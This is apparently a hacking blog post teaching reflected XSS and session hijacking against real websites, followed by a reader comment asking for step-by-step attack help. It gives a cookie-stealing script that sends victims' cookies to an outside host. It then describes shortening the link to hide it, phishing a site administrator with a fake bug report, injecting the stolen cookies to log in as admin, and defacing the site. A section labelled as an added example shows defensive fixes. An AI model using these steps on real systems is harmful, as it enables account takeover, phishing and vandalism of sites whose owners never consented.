Hello guys, hope you are fine. Yesterday we discussed Hack Website using XSS Attack, in which we learned the first type of XSS, i.e. Persistent XSS. Today we will take it a little further and cover the second type of XSS and how to hijack a session after XSS. One more thing guys, don't ask me to personally teach you this stuff as I don't have much time and it's really hectic, but if you have any problem, raise it in the comments and I will completely satisfy you while answering your problem. So, I think now we should start, so let's start:
Non-Persistent XSS:
In this method we will force our victim to go to our link; the initial steps are almost the same as in the previous method.
- First of all we will search for an XSS vulnerable site.
- After finding the site, check for its search box; it must be like this: search.php. Now you have to check whether this search.php is vulnerable or not.
- To check this add this simple code in the search box and click the search button.
Code:
<script>alert(document.cookie)</script>
- After searching with this code, if a box pops up it means this search.php is vulnerable to Non-Persistent XSS attack.
- Now, after confirming the vulnerability, add the below code in the URL of this search.php page.
Code:
"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
- Now we have to shorten the link of the whole page; for this use tinyurl or any other such service.
- Now try to find a site administrator's e-mail; for this you may use a whois lookup or any online service which gives you the details of the site's owner.
- After getting the email id, send him a fake email from any online fake mailer or through your fake id.
- In the body of the email just tell something fake like: Hey I found a huge bug in your website! and give him the shortened link of the search.php in which you have also added the code.
- Tinyurl will mask the link and won't let it go to spam.
- Once he clicks on that link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher.
- No matter what he does, even if he changes his password, you can still log in as him.
NOTE: Among these two types of XSS, Persistent is used most commonly and is the best way to get cookies.
Session Hijack
Until now we have discussed how to get someone's cookies using XSS, and now we will see how to use these cookies to enter the victim's account. This is called Session Hijack.
- OK, now we have got the admin's cookies using both methods, so we need to edit our own browser's cookies.
- First of all go to that site's admin login or its main page whose cookies you have.
- Now delete ALL of your cookies from that page. For this check the topic on cookies.
- Now go to your cookies.html page which you have made on a free hosting site and copy everything in front of the Cookie: into a notepad. These are the cookies.
- This sign ; separates cookies from each other, so first copy the code before the ; i.e. the first cookie.
- Now come back to that vulnerable site and instead of link add the following code but don't hit enter:
Code:
Javascript:void(document.cookie="ADD YOUR COOKIE HERE")
- Add that cookie in between " " and now hit enter.
- Do this with all of the cookies and refresh the page.
- And hurrah!!! you are logged in as administrator.
- So now go to your admin panel and upload your deface page; now you can do anything to that site.
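The server-side fixes that break each link of the chain described above, as an added example that is not part of the original post: the reflected search term is HTML-encoded, the session cookie is marked HttpOnly so `document.cookie` no longer exposes it, and sessions are revoked on password change so a captured id stops working. The function names, the `sid` cookie name and the in-memory session table are assumptions made for the illustration.

```javascript
// Added example, not the original post's code; all names are hypothetical.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode the characters that let reflected text leave an HTML text node or
// a quoted attribute value.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Weak form: the search term is reflected verbatim, so markup in it is parsed.
function renderSearchWeak(q) {
  return `<input name="q" value="${q}"><p>Results for ${q}</p>`;
}

// Corrected form: every reflection of the term is encoded first.
function renderSearchSafe(q) {
  const safe = escapeHtml(q);
  return `<input name="q" value="${safe}"><p>Results for ${safe}</p>`;
}

// Response for GET /search.php?q=... using the corrected renderer, with a
// Content-Security-Policy as a second layer against inline script.
function handleSearch(rawUrl) {
  const q = new URL(rawUrl, "http://localhost").searchParams.get("q") || "";
  const headers = {
    "Content-Type": "text/html; charset=utf-8",
    "Content-Security-Policy": "default-src 'self'; script-src 'self'",
  };
  return { status: 200, headers, body: renderSearchSafe(q) };
}

// Server-side session table, session id -> user (in-memory for the example).
const sessions = new Map();

// Register a session and build its Set-Cookie value. HttpOnly keeps the id out
// of document.cookie. The caller must supply an unpredictable id from a CSPRNG.
function openSession(user, sid) {
  sessions.set(sid, user);
  return `sid=${sid}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

function sessionUser(sid) {
  return sessions.has(sid) ? sessions.get(sid) : null;
}

// Call on password change or logout: every id issued earlier stops working.
function revokeSessions(user) {
  for (const [sid, owner] of sessions) if (owner === user) sessions.delete(sid);
}
```

With the corrected renderer the test string from the post is displayed as text instead of being parsed as markup, and a session id issued before `revokeSessions` no longer maps to a user.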
1 comments:
please step by step define for attack website
please send sumit.dadhich1988@gmail.com
Please do not spam. Spam comments will be deleted immediately upon my review.
Regards,
XEO Hacker